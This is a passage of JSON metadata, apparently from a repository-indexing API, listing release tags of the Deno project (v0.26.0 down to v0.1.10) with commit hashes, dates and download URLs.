ags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018